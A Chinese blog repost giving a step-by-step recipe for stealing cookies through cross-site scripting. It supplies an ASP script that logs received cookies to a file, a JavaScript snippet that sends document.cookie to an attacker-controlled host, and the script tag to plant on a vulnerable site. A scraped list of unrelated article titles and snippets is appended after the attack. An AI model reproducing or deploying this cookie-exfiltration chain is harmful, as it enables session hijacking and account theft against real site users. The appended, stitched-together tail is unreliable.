利用XSS盗取cookies
     1.把下里代码保存为cookies.asp,然后上传到能被正常访问的空间
         <%
           testfile=Server.MapPath("cookies.txt")
           msg=Request("cookies")
           set fs=server.CreateObject("scripting.filesystemobject")
           set thisfile=fs.OpenTextFile(testfile,8,True,0)
           thisfile.WriteLine(" & msg &" )
           thisfile.Close
           set fs = nothing
          %>
     2.假设***者上传地址为: http://127.0.0.1/cookie.asp
     3.然后在新建一个文件,将如下代码复制进去,保存为cookies.js
          document.forms[0].action='www.xiong.com/cookies.asp'+document.cookie
     4.同样将上面的cookies.js上传到和cookies.asp一样的目录
     5.基本环境构造好后,***者只要在存在跨站漏洞的网站写下如下代码
          <script src=www.127.0.0.1/cookies.js></script>

转载于:https://blog.51cto.com/whitehat/789469

利用XSS盗取cookies相关推荐

  1. ajax在Xss中的利用,XSS高级利用

    点击阅读 利用 xss 的 javascript 劫持 一个 xss 漏洞示例页面 1 2 3 4 5 6 7 8 9 10 $xss = @$_GET['xss']; if($xss!==null) ...

  2. 网络安全实验6 认识XSS 盗取cookie

    赞赏码 & 联系方式 & 个人闲话 [实验名称]认识XSS&盗取cookie [实验目的] 1. 了解XSS漏洞 2. 掌握盗取Cookie的方法 [实验原理] 1.什么是XS ...

  3. web漏洞利用---XSS注入攻击

    XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所 ...

  4. 【网络安全】如何使用ppmap检测和利用XSS漏洞

    关于ppmap ppmap是一款基于Go开发的漏洞扫描器/漏洞利用工具,该工具能够通过在全局上下文中检查特定变量来扫描.检测和利用XSS漏洞.该工具目前只能利用已知Gadget(可能支持部分自定义开发 ...

  5. html %3c 不给转义,八个无法利用XSS漏洞的场景

    ☝☝ 相信有很多的小盆友们曾经发现过一些疑似存在XSS漏洞的站点,但又无法完全证明这个漏洞是可以被利用的.此时的你可能处于怀疑状态,也有可能你已经验证到一半了,严重怀疑其有精神病(XSS漏洞)的情况. ...

  6. 利用selenium携带cookies实现免登录

    前面爬虫系列我在介绍中谈到过Javascript进行渲染的界面,普通的请求是无法获取关键代码块的. selenium确实是个神器,但是越来越多的网站也对selenium进行了识别和通过登录方式进行了限 ...

  7. 利用XSS漏洞实现键盘记录器

    利用XSS漏洞实现键盘记录器 本实验以反射性的XSS漏洞为例 实验环境:dvwa靶机(ip:192.168.135.140) kali linux(ip:192.168.135.138) 1.首先开启 ...

  8. 利用XSS进行网页钓鱼

    [XSS漏洞]利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster. 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点- 说昨天看我朋友圈发的照片,已经从 ...

  9. xss sql注入 php,利用xss 执行sql注入

    看见phpcms v9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很多其他的用法!但是,这个注入我没有找到phpcms v9.1. ...

最新文章

  1. 01_字符串处理-----04_在文本中应用ZIpf定律
  2. 简易嵌入式管理平台 C 实现
  3. pthread_mutex_lock 和 pthread_mutex_unlock
  4. socket编程的select模型
  5. Android UI线程和非UI线程
  6. 2007标注没有文字_应用技巧:CAD在机械工程制图中尺寸标注
  7. ajax post传输到后台为空?【解决方案】
  8. pki和证书_PKI的位和字节
  9. web安全day42:使用BurpSuite理解Web工作机制
  10. GB35114---基于pjsip协议库开发问题
  11. FineReport如何手动推送APP消息
  12. C语言中指针与取地址符详解
  13. 利用Druid Monitor做数据库连接异常排查
  14. 升级wamp的php版本,Wamp升级PHP版本
  15. 微信公众平台编辑器可以剪裁和替换正文图片了
  16. OpenLayers 3实践与原理探究1-ol2 VS ol3
  17. 站长号文库:.lol域名介绍
  18. deadline(deadline是什么意思)
  19. PageRank网页排名算法
  20. 图像质量评价数据库TID2013 网盘下载

热门文章

  1. mfc搜索新建access字段_vs2010MFC中使用ODBC链接ACCESS数据库,怎样编写查找功能?...
  2. java newfile() bug_java-运行类时,它将生成一个0kb的空白文件.有人可以指出我的错误之处吗?...
  3. pythondjango是干什么的_python django框架是什么?怎么使用?
  4. mysql 表名规范_MYSQL数据库命名及设计规范
  5. sublime press key “escape” can't type anything
  6. AT3 two-dimensional surfaces : the sphere
  7. 卷积神经网络的重要知识点
  8. python绘制子图去掉x轴坐标值_python – 关闭图形的所有子图的轴
  9. 开源中文关系抽取框架,来自浙大知识引擎实验室
  10. EfficientDet训练自己的物体检测数据集